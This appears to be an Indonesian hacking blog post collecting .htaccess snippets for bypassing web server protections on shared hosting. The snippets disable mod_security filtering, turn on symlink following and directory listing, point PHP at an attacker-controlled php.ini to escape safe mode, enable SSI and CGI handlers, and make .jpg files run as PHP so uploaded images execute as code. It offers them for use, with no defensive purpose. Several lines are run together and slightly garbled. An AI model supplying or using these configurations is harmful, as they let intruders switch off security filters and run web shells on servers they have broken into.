Kumpulan Code untuk Bypass
Bypass mod security :
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Bypass symlink :
Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php
Atau Bisa juga :
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
Bypass safe mode :
Options +FollowSymLinksBypass 400
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
Options +IncludesRun SSI
AddType text/html .shtml
AddHandler server-parsed .shtml
AddType text/html .shtmlRun JPG ke PHP
AddOutputFilter INCLUDES .shtml
AddHandler application/x-httpd-php .jpg .php
Sekian dari gw , Lanjutkan Ilmu mu ya wkwkkwkwk :'v
EmoticonEmoticon